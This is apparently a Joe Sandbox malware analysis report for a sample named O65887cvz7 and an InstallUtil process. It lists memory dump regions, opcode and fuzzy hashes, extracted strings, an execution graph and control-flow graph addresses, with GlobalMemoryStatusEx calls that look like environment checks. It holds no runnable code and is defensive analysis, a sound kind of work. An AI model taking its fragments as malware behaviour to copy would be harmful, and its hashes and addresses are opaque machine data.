                                                            • Instruction ID: 281274d006afd37ee2194bc38cfae5872a8ad3e2a0f510713d3e63659d09c84e
                                                            • Opcode Fuzzy Hash: e7a7d6f29284474afae23bc82a527dbd03168e6341dc595a81fb8bfcc19863d9
                                                            • Instruction Fuzzy Hash: A7D01270D00108EBCB00DFB4E90159DB7F9EB49204F504599D408E3201DA315F009B44
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 546da31f022e42f9f2422de3e8e6e3e1adca1eb4832c3ef8b4e150d80e61337e
                                                            • Instruction ID: 30880240c090ff318203d5eb5336ff43fd7020f9631f33265528311dd090622c
                                                            • Opcode Fuzzy Hash: 546da31f022e42f9f2422de3e8e6e3e1adca1eb4832c3ef8b4e150d80e61337e
                                                            • Instruction Fuzzy Hash: E5D0CA394983C88FEB02037428220E93FB88C8322130886C2DC848A0238116182A9B11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b25668f4a06fc2fe37a6289558fae7bea2227f9a3eca1ac0b654a3ccb55da42c
                                                            • Instruction ID: 3311f8bf49aa8b4cc490ae37b660e2e15d17f57ae95b53a0b187d2dbb1dfffa7
                                                            • Opcode Fuzzy Hash: b25668f4a06fc2fe37a6289558fae7bea2227f9a3eca1ac0b654a3ccb55da42c
                                                            • Instruction Fuzzy Hash: E5C04C1511E2C14FC20302702C720E12FA5988705539945C2D8C48A163D005122BA351
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ee7ec6a7ed42d31bb20e05c99e2eb80f05a28a87216b12dc6394c7a58f45fc5f
                                                            • Instruction ID: 1162ab7c79ee0e8d4debb596c2375c19b9824d95a52a65ba73b3a0f222108de7
                                                            • Opcode Fuzzy Hash: ee7ec6a7ed42d31bb20e05c99e2eb80f05a28a87216b12dc6394c7a58f45fc5f
                                                            • Instruction Fuzzy Hash: BA90023148464C8B855027997509669B75C95445157800051A94D925065A5A68204695
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'eq$4'eq
                                                            • API String ID: 0-907361030
                                                            • Opcode ID: 17f498f539173f9cf25d59f86a6ac6e94e6443d7c4e5d3aae956740f67cb1b6a
                                                            • Instruction ID: 76dce8bca92dc3de0c2c65acdb6b10505d474933a66318712a9f2684aa7d867b
                                                            • Opcode Fuzzy Hash: 17f498f539173f9cf25d59f86a6ac6e94e6443d7c4e5d3aae956740f67cb1b6a
                                                            • Instruction Fuzzy Hash: 6C71F8B4E00604CFDB09EF6AE54179EBBF3FF88304F18C529E044A7669DB7519558B84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'eq$4'eq
                                                            • API String ID: 0-907361030
                                                            • Opcode ID: 56081360ab79c54e33c9a44e3df97ff60780f419bc98fc1ab8ebbd21630cbfd1
                                                            • Instruction ID: 30b7a27d8999dfee5809d4e3d26b957374b15ef92607ccd300dc41c37e50cda3
                                                            • Opcode Fuzzy Hash: 56081360ab79c54e33c9a44e3df97ff60780f419bc98fc1ab8ebbd21630cbfd1
                                                            • Instruction Fuzzy Hash: 377118B4E00608CBDB09EF6AE54179EBBF2FF88304F18C529E004A7669EB7519558B84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Z
                                                            • API String ID: 0-1505515367
                                                            • Opcode ID: d2109c99c42cbb5043fe091d13597a7114dce6ac2d7fcbb5fee2e15dacd90ce6
                                                            • Instruction ID: 41fdeaabf556603d41a684d6d6e4546dd8eabb6a68ea20afbc96a2746068e332
                                                            • Opcode Fuzzy Hash: d2109c99c42cbb5043fe091d13597a7114dce6ac2d7fcbb5fee2e15dacd90ce6
                                                            • Instruction Fuzzy Hash: 66311671D096558FEB69CF6A8C5839ABFF3AFC9300F14C0EAC44CA6255E77009858F21
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: '
                                                            • API String ID: 0-1997036262
                                                            • Opcode ID: 0b37c1ea428324c89ccfbc890b27b0c6d2c6b3626947d4311e7e1dc494f854ec
                                                            • Instruction ID: 091cd7215cbfdbe040f57ab60beb0387b9ca923da63db35218ac9eef41a93156
                                                            • Opcode Fuzzy Hash: 0b37c1ea428324c89ccfbc890b27b0c6d2c6b3626947d4311e7e1dc494f854ec
                                                            • Instruction Fuzzy Hash: 37316975E056198BEB58DF6BCC4869EFAF7AFC8300F14C1BAC40CA6658DB7409818F54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Z
                                                            • API String ID: 0-1505515367
                                                            • Opcode ID: ed702fce4aa74b1d28f1961f12a21136d987a984585fd4d664cc8fa3b26a42a6
                                                            • Instruction ID: 57a8f6ccbc0c86609a7551f03fb20846eb738e5c1d6764804c3cd946379972d3
                                                            • Opcode Fuzzy Hash: ed702fce4aa74b1d28f1961f12a21136d987a984585fd4d664cc8fa3b26a42a6
                                                            • Instruction Fuzzy Hash: 5421C471D456298BEB68CF6BDC5479ABAF7BFC8305F04C0FAD50CA6215EB7009858E50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f33f229595aa08d3341fdc177749d9efaf2defe78657d61e50e5107e7084bd8
                                                            • Instruction ID: 5fb22cd214dabe9af2d091536df4a756c0df2a993e0fc402daa62f61f9fad2ac
                                                            • Opcode Fuzzy Hash: 7f33f229595aa08d3341fdc177749d9efaf2defe78657d61e50e5107e7084bd8
                                                            • Instruction Fuzzy Hash: FD32C170A04245DFCF11CF6AC484BAEBBF5FF89300F1585AAE846AB251DB34E985CB51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b241189726ff3f93238e53026ddff1cdc51bbc55655259fbb9794fb0f8e4885
                                                            • Instruction ID: ed14c52a5befb64a501b84e8adfcc8462f76af483acbb33f698a857989c5ed60
                                                            • Opcode Fuzzy Hash: 2b241189726ff3f93238e53026ddff1cdc51bbc55655259fbb9794fb0f8e4885
                                                            • Instruction Fuzzy Hash: AC316AB1D056198BEB5CDF6BCC4469EFAF7AFC8300F14C1BAC40CA6668DB7409818E44
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJjq$[2*$jjjjjj$$eq$$eq$Uv
                                                            • API String ID: 0-37053438
                                                            • Opcode ID: eab4ca3b0cc3f85893e6c46b13c33076e19876c6e65349a56cc98167e0588199
                                                            • Instruction ID: 495c33275464dbbdaca0d560e84448b69f609173e520c89a35d87ccf798bca57
                                                            • Opcode Fuzzy Hash: eab4ca3b0cc3f85893e6c46b13c33076e19876c6e65349a56cc98167e0588199
                                                            • Instruction Fuzzy Hash: F8B0113020A000CAEF088A008A8023833B0BF8220AB3880ABC00B0EA02CA30C882CA20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJjq$[2*$jjjjjj$$eq$$eq$Uv
                                                            • API String ID: 0-37053438
                                                            • Opcode ID: fd5638494260c9eade39c6dbe4842e2102355da976df6396d99e65cca1bfd728
                                                            • Instruction ID: 5de5763089455f646f86f9f3a7c8af7bdbaa6c3f7cd52162b29f022d1f11f420
                                                            • Opcode Fuzzy Hash: fd5638494260c9eade39c6dbe4842e2102355da976df6396d99e65cca1bfd728
                                                            • Instruction Fuzzy Hash: BFB092B0506200CF8B05CA00829052473B0FF9224032580AEC0070E41286308983DA01
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2034230349.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2a90000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJjq$[2*$jjjjjj$$eq$$eq$Uv
                                                            • API String ID: 0-37053438
                                                            • Opcode ID: 47d4880ce1c6af7ff5bd8624fb92dfa1cceab5ca3ac1c2347d461171249e2357
                                                            • Instruction ID: 69552ae0658eba6b9272372bd59eba131736b03dfe2399199673dc2bcffb745d
                                                            • Opcode Fuzzy Hash: 47d4880ce1c6af7ff5bd8624fb92dfa1cceab5ca3ac1c2347d461171249e2357
                                                            • Instruction Fuzzy Hash: 10B0922140E381CFC7524E6599C1040BF60AA62140318C5EEC4D54E457C1208686EB21
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2055705912.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6090000_O65887cvz7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !$"$(oeq$\seq
                                                            • API String ID: 0-391823324
                                                            • Opcode ID: ba576e02e8757f5563c98c8d39ebce931fd1f08d0dd5359bf40a756e6b68566e
                                                            • Instruction ID: 7f8bed27c01afae5ef368704de7f9d1cc8e20a30a570f0a740396c07053552a8
                                                            • Opcode Fuzzy Hash: ba576e02e8757f5563c98c8d39ebce931fd1f08d0dd5359bf40a756e6b68566e
                                                            • Instruction Fuzzy Hash: E831E974E4026C9FDBA4DFA5C8457EDBBB1FB89341F0085AAC519A7280D7B01A85CF91

                                                            Execution Graph

                                                            Execution Coverage:10.7%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:21
                                                            Total number of Limit Nodes:4
                                                            execution_graph 27504 3050848 27506 3050849 27504->27506 27505 305091b 27506->27505 27508 3051340 27506->27508 27510 3051344 27508->27510 27509 3051448 27509->27506 27510->27509 27512 3057059 27510->27512 27513 3057063 27512->27513 27514 3057119 27513->27514 27517 65fce78 27513->27517 27523 65fce88 27513->27523 27514->27510 27519 65fce9d 27517->27519 27518 65fd0b2 27518->27514 27519->27518 27520 65fd730 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27519->27520 27521 65fd4d0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27519->27521 27522 65fd4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27519->27522 27520->27519 27521->27519 27522->27519 27524 65fce9d 27523->27524 27525 65fd0b2 27524->27525 27526 65fd730 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27524->27526 27527 65fd4d0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27524->27527 27528 65fd4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27524->27528 27525->27514 27526->27524 27527->27524 27528->27524
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2170860062.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_3050000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d63b780e31264abd0ca0a07f56d082cfbe2748b56bfe52844e9c8ec6fe798e23
                                                            • Instruction ID: e18b2a7964862d1fe95c37bdd1c3abc3c04a2b16cc3e7e3f8414445e0e5a7593
                                                            • Opcode Fuzzy Hash: d63b780e31264abd0ca0a07f56d082cfbe2748b56bfe52844e9c8ec6fe798e23
                                                            • Instruction Fuzzy Hash: 0663EB31D10B1A8EDB11EB68C8446AAF7B1FF99300F15D79AE45977121EB70AAC4CF81
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2170860062.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_3050000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a32faec617b15d7751ee56e3e3b847b080ee31a10d25ff2d9494c4c496f1a2c6
                                                            • Instruction ID: bf6ac7a7f5f9e3f45b82289b728c76df04a30cdce5d002192bfa9672c129f2fb
                                                            • Opcode Fuzzy Hash: a32faec617b15d7751ee56e3e3b847b080ee31a10d25ff2d9494c4c496f1a2c6
                                                            • Instruction Fuzzy Hash: C9332031D1071A8EDB11DF68C8846EEF7B5FF99300F15C69AE449A7221EB70AAC5CB41
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2170860062.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_3050000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56d60778919c89bba56f98f480032f1ba43e2382fb2d02fd7fd5c148aa4e46cd
                                                            • Instruction ID: 5338e462ca72a4d5376f26bdf2cc2e3abbd1f7bc0cc6746c706b9024a108aa9e
                                                            • Opcode Fuzzy Hash: 56d60778919c89bba56f98f480032f1ba43e2382fb2d02fd7fd5c148aa4e46cd
                                                            • Instruction Fuzzy Hash: 7A23C731D10B1A8ADB11EF68C8446AAF7B1FF99300F15D79AE45977121EB70AAC4CF81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2565 3053e48-3053eae 2567 3053eb0-3053ebb 2565->2567 2568 3053ef8-3053efa 2565->2568 2567->2568 2570 3053ebd-3053ec9 2567->2570 2569 3053efc-3053f54 2568->2569 2579 3053f56-3053f61 2569->2579 2580 3053f9e-3053fa0 2569->2580 2571 3053eec-3053ef6 2570->2571 2572 3053ecb-3053ed5 2570->2572 2571->2569 2573 3053ed7 2572->2573 2574 3053ed9-3053ee8 2572->2574 2573->2574 2574->2574 2576 3053eea 2574->2576 2576->2571 2579->2580 2581 3053f63-3053f6f 2579->2581 2582 3053fa2-3053fba 2580->2582 2583 3053f71-3053f7b 2581->2583 2584 3053f92-3053f9c 2581->2584 2589 3054004-3054006 2582->2589 2590 3053fbc-3053fc7 2582->2590 2585 3053f7d 2583->2585 2586 3053f7f-3053f8e 2583->2586 2584->2582 2585->2586 2586->2586 2588 3053f90 2586->2588 2588->2584 2591 3054008-3054056 2589->2591 2590->2589 2592 3053fc9-3053fd5 2590->2592 2600 305405c-305406a 2591->2600 2593 3053fd7-3053fe1 2592->2593 2594 3053ff8-3054002 2592->2594 2595 3053fe5-3053ff4 2593->2595 2596 3053fe3 2593->2596 2594->2591 2595->2595 2598 3053ff6 2595->2598 2596->2595 2598->2594 2601 3054073-30540d3 2600->2601 2602 305406c-3054072 2600->2602 2609 30540d5-30540d9 2601->2609 2610 30540e3-30540e7 2601->2610 2602->2601 2609->2610 2611 30540db 2609->2611 2612 30540f7-30540fb 2610->2612 2613 30540e9-30540ed 2610->2613 2611->2610 2615 30540fd-3054101 2612->2615 2616 305410b-305410f 2612->2616 2613->2612 2614 30540ef-30540f2 call 3050ab0 2613->2614 2614->2612 2615->2616 2618 3054103-3054106 call 3050ab0 2615->2618 2619 3054111-3054115 2616->2619 2620 305411f-3054123 2616->2620 2618->2616 2619->2620 2624 3054117-305411a call 3050ab0 2619->2624 2621 3054125-3054129 2620->2621 2622 3054133-3054137 2620->2622 2621->2622 2625 305412b 2621->2625 2626 3054147 2622->2626 2627 3054139-305413d 2622->2627 2624->2620 2625->2622 2630 3054148 2626->2630 2627->2626 2629 305413f 2627->2629 2629->2626 2630->2630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2170860062.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_3050000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \Vl
                                                            • API String ID: 0-682378881
                                                            • Opcode ID: 52bec5c7452afa34b7ad829b3660908aebd8160aac21ba8e1252843e82c1323b
                                                            • Instruction ID: 7f93da1c39b0bfac6ad3fc65c21f52aa5cb1b3fca3c98517ca1017c93911312f
                                                            • Opcode Fuzzy Hash: 52bec5c7452afa34b7ad829b3660908aebd8160aac21ba8e1252843e82c1323b
                                                            • Instruction Fuzzy Hash: 52919171E012099FDF50CFA9C9857DEFBF2AF88310F288129E805E7294DB749885CB41
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2170860062.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_3050000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e1ba58f6db79a2016ec7e31c7dc68dfeadce4ba03fb4c659f83d9f3ae93506b
                                                            • Instruction ID: 57d131677cbca5a2c8123ff21686be7ef8ea43f69fd09083768e9dfd7fe887ec
                                                            • Opcode Fuzzy Hash: 9e1ba58f6db79a2016ec7e31c7dc68dfeadce4ba03fb4c659f83d9f3ae93506b
                                                            • Instruction Fuzzy Hash: C3326B74A01205CFDB54DFA8D984BAEBBF6EB88310F188569E809DB395DB31DD41CB90
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2170860062.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_3050000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23051d2d7c4818e0cbce697a5aac084e638e2c412f592dea8f0c621dd5ca698f
                                                            • Instruction ID: b200f54efecdb7ab73d07cc4ac3f0e80485897389e4629dfd62a081261d477cd
                                                            • Opcode Fuzzy Hash: 23051d2d7c4818e0cbce697a5aac084e638e2c412f592dea8f0c621dd5ca698f
                                                            • Instruction Fuzzy Hash: C1B18370E012098FDB50CFAAD9917DEFBF2AF88314F188529E815E7254EB749885CB91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1125 3056ea1-3056eaa 1126 3056eb1-3056ebe 1125->1126 1127 3056eac-3056ead 1125->1127 1128 3056ec2-3056f0a call 3056c08 1126->1128 1127->1126 1137 3056f26-3056f32 1128->1137 1138 3056f0c-3056f25 call 3056724 1128->1138 1142 3056f34 1137->1142 1143 3056f39-3056f3a 1137->1143 1142->1143 1144 3056f41-3056f55 1143->1144 1145 3056f3c 1143->1145 1148 3056f57-3056f5a 1144->1148 1145->1128 1147 3056f3e 1145->1147 1147->1144 1149 3056f8d-3056f90 1148->1149 1150 3056f5c-3056f70 1148->1150 1151 3056fa4-3056fa7 1149->1151 1152 3056f92-3056f99 1149->1152 1158 3056f76 1150->1158 1159 3056f72-3056f74 1150->1159 1156 3056fe3-3056fe6 1151->1156 1157 3056fa9-3056fde 1151->1157 1154 3056f9f 1152->1154 1155 3057168-305716f 1152->1155 1154->1151 1160 3056ff6-3056ff8 1156->1160 1161 3056fe8 call 3057988 1156->1161 1157->1156 1164 3056f79-3056f88 1158->1164 1159->1164 1162 3056fff-3057002 1160->1162 1163 3056ffa 1160->1163 1166 3056fee-3056ff1 1161->1166 1162->1148 1165 3057008-3057017 1162->1165 1163->1162 1164->1149 1169 3057041-3057056 1165->1169 1170 3057019-305701c 1165->1170 1166->1160 1169->1155 1172 3057024-305703f 1170->1172 1172->1169 1172->1170
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2170860062.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_3050000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LReq$LReq
                                                            • API String ID: 0-1701832695
                                                            • Opcode ID: 5497115b90af9e73d0a27ee9100d5287171fd709f9a7bb1dd19ee9080b30bf3a
                                                            • Instruction ID: 2fd1a12e679aa7d8ce710297c24fa155ec7ba819d368b821db64338057476192
                                                            • Opcode Fuzzy Hash: 5497115b90af9e73d0a27ee9100d5287171fd709f9a7bb1dd19ee9080b30bf3a
                                                            • Instruction Fuzzy Hash: 2651AB31E112099FDB14DBB8C55469FBBB6EF86300F55846AF805EB390EB72D8418B81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2354 65fe0a0-65fe0ab 2355 65fe0ad-65fe0d4 call 65fd4c0 2354->2355 2356 65fe0d5-65fe0e8 2354->2356 2360 65fe0eb-65fe0f4 call 65fd808 2356->2360 2363 65fe0fa-65fe138 2360->2363 2364 65fe0f6-65fe0f9 2360->2364 2363->2360 2369 65fe13a-65fe159 2363->2369 2371 65fe15f-65fe1ec GlobalMemoryStatusEx 2369->2371 2372 65fe15b-65fe15e 2369->2372 2375 65fe1ee-65fe1f4 2371->2375 2376 65fe1f5-65fe21d 2371->2376 2375->2376
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2188524116.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_65f0000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e013f5660c486bb47239defce0e4f95eeba7bc7725cdb3a2721d753a9c147077
                                                            • Instruction ID: df212895fa6e2a33f43d5c26cb15f6b387e5e381f70089840505862665eba3b3
                                                            • Opcode Fuzzy Hash: e013f5660c486bb47239defce0e4f95eeba7bc7725cdb3a2721d753a9c147077
                                                            • Instruction Fuzzy Hash: 2B412672D103599FCB14DF69D8046EEBFF5FF89220F14856AE508A7250DB749885CBE0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2468 65fd808-65fe1ec GlobalMemoryStatusEx 2471 65fe1ee-65fe1f4 2468->2471 2472 65fe1f5-65fe21d 2468->2472 2471->2472
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,065FE0F2), ref: 065FE1DF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2188524116.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_65f0000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: d382bd8db0546494758b2442d9c2dc88bc53e4901b4abf579e8d0908369a8103
                                                            • Instruction ID: 5b3ae8a4cdde48f0e7ee33d41a0e022bb9ab63fae8488c2c63d9b28daf78d986
                                                            • Opcode Fuzzy Hash: d382bd8db0546494758b2442d9c2dc88bc53e4901b4abf579e8d0908369a8103
                                                            • Instruction Fuzzy Hash: 6A1133B1C002599BDB10CF9AC944AAEFBF4FF48320F10816AE918A7240D778A944CFA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2631 3053e3f-3053eae 2633 3053eb0-3053ebb 2631->2633 2634 3053ef8-3053efa 2631->2634 2633->2634 2636 3053ebd-3053ec9 2633->2636 2635 3053efc-3053f54 2634->2635 2645 3053f56-3053f61 2635->2645 2646 3053f9e-3053fa0 2635->2646 2637 3053eec-3053ef6 2636->2637 2638 3053ecb-3053ed5 2636->2638 2637->2635 2639 3053ed7 2638->2639 2640 3053ed9-3053ee8 2638->2640 2639->2640 2640->2640 2642 3053eea 2640->2642 2642->2637 2645->2646 2647 3053f63-3053f6f 2645->2647 2648 3053fa2-3053fba 2646->2648 2649 3053f71-3053f7b 2647->2649 2650 3053f92-3053f9c 2647->2650 2655 3054004-3054006 2648->2655 2656 3053fbc-3053fc7 2648->2656 2651 3053f7d 2649->2651 2652 3053f7f-3053f8e 2649->2652 2650->2648 2651->2652 2652->2652 2654 3053f90 2652->2654 2654->2650 2657 3054008-305401a 2655->2657 2656->2655 2658 3053fc9-3053fd5 2656->2658 2665 3054021-3054056 2657->2665 2659 3053fd7-3053fe1 2658->2659 2660 3053ff8-3054002 2658->2660 2661 3053fe5-3053ff4 2659->2661 2662 3053fe3 2659->2662 2660->2657 2661->2661 2664 3053ff6 2661->2664 2662->2661 2664->2660 2666 305405c-305406a 2665->2666 2667 3054073-30540d3 2666->2667 2668 305406c-3054072 2666->2668 2675 30540d5-30540d9 2667->2675 2676 30540e3-30540e7 2667->2676 2668->2667 2675->2676 2677 30540db 2675->2677 2678 30540f7-30540fb 2676->2678 2679 30540e9-30540ed 2676->2679 2677->2676 2681 30540fd-3054101 2678->2681 2682 305410b-305410f 2678->2682 2679->2678 2680 30540ef-30540f2 call 3050ab0 2679->2680 2680->2678 2681->2682 2684 3054103-3054106 call 3050ab0 2681->2684 2685 3054111-3054115 2682->2685 2686 305411f-3054123 2682->2686 2684->2682 2685->2686 2690 3054117-305411a call 3050ab0 2685->2690 2687 3054125-3054129 2686->2687 2688 3054133-3054137 2686->2688 2687->2688 2691 305412b 2687->2691 2692 3054147 2688->2692 2693 3054139-305413d 2688->2693 2690->2686 2691->2688 2696 3054148 2692->2696 2693->2692 2695 305413f 2693->2695 2695->2692 2696->2696
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2170860062.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_3050000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \Vl
                                                            • API String ID: 0-682378881
                                                            • Opcode ID: ab7114d04d6610303104218f8e31f2690a9a105125f74cab3a9adc9632335e5b
                                                            • Instruction ID: f67555a2ea7f1ab3b5d5b07aaabdad83866289c6c754bd74d6f41299df4ef83e
                                                            • Opcode Fuzzy Hash: ab7114d04d6610303104218f8e31f2690a9a105125f74cab3a9adc9632335e5b
                                                            • Instruction Fuzzy Hash: 06918E71E01209DFDB50CFA9C9857DEFBF2AF48314F288129E815EB294DB749885CB51
                                                            Strings
                                                            Memory Dump Source
